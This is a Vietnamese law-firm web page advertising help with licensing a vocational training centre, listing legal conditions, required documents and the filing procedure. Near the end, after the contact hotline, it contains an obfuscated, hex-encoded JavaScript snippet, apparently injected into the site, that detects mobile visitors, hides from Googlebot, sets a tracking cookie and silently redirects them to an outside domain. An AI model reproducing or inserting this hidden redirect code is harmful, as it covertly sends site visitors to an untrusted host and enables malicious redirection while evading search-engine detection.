Hỗ trợ trực tuyến

Xin giấy phép thành lập trung tâm dạy nghề

Với tư cách là đơn vị tư vấn luật hàng đầu Việt Nam, Luật Oceanlaw xin cung cấp dich vụ xin cấp phép thành lập trung tâm dạy nghề nhanh chóng và uy tín nhằm đáp ứng nhu cầu thiết yếu của Quý khách hàng hiện nay. Chúng tôi tư vấn cụ thể cho Quý khách hàng về Đề án thành lập, những phương án tổ chức đào tạo, Quy chế quản lý Giảng viên và các học viên, Phương án, cơ cấu tổ chức bộ phận nhân sự, tổ chức hội thảo, thuyết trình các chuyên ngành.

Dịch vụ xin giấy phép đào tạo nghề

Điều kiện thành lập trung tâm dạy nghề

Trung tâm dạy nghề được thành lập khi có đề án đảm bảo những điều kiện sau:
– Phù hợp với quy hoạch mạng lưới những cơ sở dạy nghề của cả nước trong mỗi thời kỳ và quy hoạch, kế hoạch phát triển mạng lưới của trung tâm dạy nghề của Bộ, cơ quan trung ương của Tổ chức chính trị – xã hội, UBND cấp tỉnh.
– Quy mô đào tạo tối thiểu là 50 học sinh đối với trung tâm dạy nghề tư thục.
– Đội ngũ cán bộ giáo viên, cán bộ quản lý đủ số lượng, đồng bộ về cơ cấu, đạt tiêu chuẩn phẩm chất, trình độ và kỹ năng nghề theo qui định của Bộ Lao động – Thương binh và Xã hội qui định chuẩn giáo viên, giảng viên dạy nghề, trong đó:

 • Tỷ lệ học sinh quy đổi trên giáo viên quy đổi nhiều nhất là 20 học sinh trên 1 giáo viên;
 • Phải có giáo viên cơ hữu cho mỗi nghề tổ chức đào tạo.

Về cơ sở vật chất và trang thiết bị dạy nghề:

– Cơ sở vật chất thích hợp với quy mô, trình độ đào tạo của mỗi nghề và được thiết kế xây dựng căn cứ vào Tiêu chuẩn xây dựng Việt Nam TCXD VN 60: 2003 “Trường dạy nghề – Tiêu chuẩn thiết kế” được ban hành căn cứ theo Quyết định số 21/2003/QĐ-BXD ngày 28/7/2003 của Bộ trưởng Bộ Xây dựng. Cụ thể:

 • Diện tích đất sử dụng ít nhất là 1.000 m2 đối với khu vực đô thị và 2.000 m2 đối với khu vực bên ngoài đô thị;
 • Phòng lý thuyết đáp ứng được quy mô đào tạo theo qui định. Diện tích phòng học lý thuyết ít nhất 1,3 m2/01 học sinh quy đổi;
 • Xưởng thực hành đáp ứng được yêu cầu thực hành căn cứ theo chương trình dạy nghề trình độ sơ cấp. Diện tích phòng học thực hành ít nhất đạt 2,5 m2/01 học sinh quy đổi.

– Thiết bị dạy nghề: Có đầy đủ thiết bị dạy lý thuyết và thực hành phù hợp với từng nghề, trình độ và quy mô đào tạo theo qui định.

Về khả năng tài chính:

– Có đủ khả năng về mặt tài chính đảm bảo cho đầu tư và hoạt động của trung tâm dạy nghề. Nguồn vốn để thành lập trung tâm đào tạo nghề tối thiểu là 02 tỷ đồng Việt Nam được đóng góp bằng nguồn vốn hợp pháp, không tính giá trị về đất đai.

Điều kiện cho phép thành lập phân hiệu hoặc cơ sở đào tạo khác thuộc trung tâm đào tạo nghề tư thục:

 • Việc cho phép thành lập phân hiệu hoặc cơ sở đào tạo khác thuộc trung tâm cần phải đảm bảo đáp ứng những điều kiện về cơ sở vật chất và trang thiết bị dạy nghề, đội ngũ giảng viên, giáo viên và cán bộ quản lý dạy nghề và những điều kiện đảm bảo khác để giảng dạy từng nghề theo quy mô dự kiến đào tạo tại phân hiệu hoặc cơ sở đào tạo đó.
 • Trường hợp thành lập phân hiệu/cơ sở đào tạo trên địa bàn tỉnh khác còn cần phải có văn bản đồng ý về chủ trương thành lập phân hiệu hoặc cơ sở đào tạo của Chủ tịch UBND cấp tỉnh, địa điểm trung tâm dự kiến thành lập phân hiệu/cơ sở đào tạo.

Hồ sơ cần chuẩn bị khi thành lập trung tâm dạy nghề

Một số giấy tờ cần chuẩn bị khi muốn thành lập trung tâm đào tạo nghề:

 • Đơn đề nghị thành lập trung tâm dạy nghề của tổ chức, cá nhân.
 • Đề án thành lập trung tâm dạy nghề, trong đó cần xác định rõ sự cần thiết thành lập trung tâm, mục tiêu đào tạo, tổ chức bộ máy và những điều kiện đảm bảo cho hoạt động của trung tâm, kế hoạch và tiến độ thực hiện đề án, hiệu quả về kinh tế – xã hội.
 • Dự kiến về số lượng giáo viên đảm bảo thích hợp với quy mô, trình độ cho mỗi nghề đào tạo của trung tõm.
 • Dự thảo Quy chế tổ chức và hoạt động của trung tâm dạy nghề.
 • Bản sao (đã chứng thực) Giấy chứng nhận quyền sử dụng đất, quyền sở hữu nhà ở hay tài sản khác gắn liền với đất hay văn bản thỏa thuận của UBND cấp tỉnh về chủ trương giao đất nhằm xây dựng trung tâm, trong đó xác định trừ về diện tích, mốc giới, địa chỉ khu đất xây dựng trung tâm.
 • Văn bản xác nhận của Ngân hàng thương mại (địa điểm tổ chức, cá nhân đề nghị thành lập trung tâm mở tài khoản) về số dư tiền gửi của tổ chức, cá nhân đề nghị thành lập trung tâm dạy nghề và cam kết chỉ sử dụng để đầu tư xây dựng trung tâm và chi phí cho nhuqngz hoạt động thường niên của trung tâm sau khi được thành lập. Những giấy tờ khác chứng minh quyền sở hữu về tài sản là vốn góp của cá nhân đề nghị được thành lập trung tâm dạy nghề.

 Đối với trung tâm có từ 2 thành viên góp vốn trở lên, hồ sở còn cần được bổ sung:

 • Biên bản cử người đại diện đứng tên thành lập trung tâm đào tạo nghề của các thành viên góp vốn.
 • Danh sách những thành viên Ban sáng lập thành lập trung tâm.
 • Danh sách và hình thức góp vốn của những cổ đông cam kết góp vốn thành lập trung tâm.
 • Danh sách, biên bản góp vốn của những cổ đông cam kết góp vốn.

Trình tự thực hiện xin giấy phép thành lập trung tâm dạy nghề

 • Tổ chức, cá nhân nộp hồ sơ trên Sở Lao động – Thương binh và Xã hội.
 • Sở Lao động – Thương binh và Xã hội tiến hành tiếp nhận hồ sơ gửi Hội đồng thẩm định. Căn cứ vào kết quả thẩm định hồ sơ của Hội đồng thẩm định, Sở Lao động – Thương binh và Xã hội gửi hồ sơ đề nghị Chủ tịch UBND tỉnh xem xét, cho phép thành lập trung tâm dạy nghề hoặc phân hiệu/cơ sở đào tạo khác thuộc trung tâm dạy nghề.
 • Tổ chức, cá nhân nhận kết quả trên Sở Lao động – Thương binh và Xã hội

Dịch vụ xin giấy phép thành lập trung tâm dạy nghề của Oceanlaw

 • Luật Oceanlaw thay khách hàng tiến hành soạn thảo các hồ sơ và đại diện công việc theo ủy quyền
 • Theo nhu cầu của Quý khách hàng, chúng tôi sẽ trực tiếp soạn thảo hồ sơ.
 • Tiến hành nộp hồ sơ xin cấp phép thành lập trung tâm dạy nghề trên Sở Lao động – Thương binh và Xã hội
 • Đại diện theo dõi tiến trình xử lý và thông báo kết quả nộp hồ sơ cho Quý khách hàng;
 • Đại diện theo dõi hồ sơ và trả lời Sở Lao động – Thương binh và Xã hội thông báo kết quả cho Quý khách hàng;
 • Đại diện nhận kết quả trên Sở Lao động – Thương binh và Xã hội cho khách hàng;
 • Oceanlaw tiến hành bàn giao toàn bộ giấy tờ cho Quý khách hàng và thanh lý hợp đồng; đồng thời trả lời các vướng mắc cũng như tư vấn cho khách hàng một số vấn đề có thể gặp phải khi trung tâm chính thức hoạt động.

Trên đây là những tư vấn sơ bộ những vấn đề liên quan tới thủ tục xin giấy phép thành lập trung tâm đào tạo nghề, nếu có thắc mắc hay khó khăn gì trong quá trình chuẩn bị và làm thủ tục Quý khách hàng hãy liên hệ tới Hotline 0965 15 13 11 để được luật sư của OCeanlaw trực tiếp giải đáp.

var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Ý kiến bạn đọc (0)

© 2016 Xin giấy phép con. Thiết kế Website bởi VietMoz.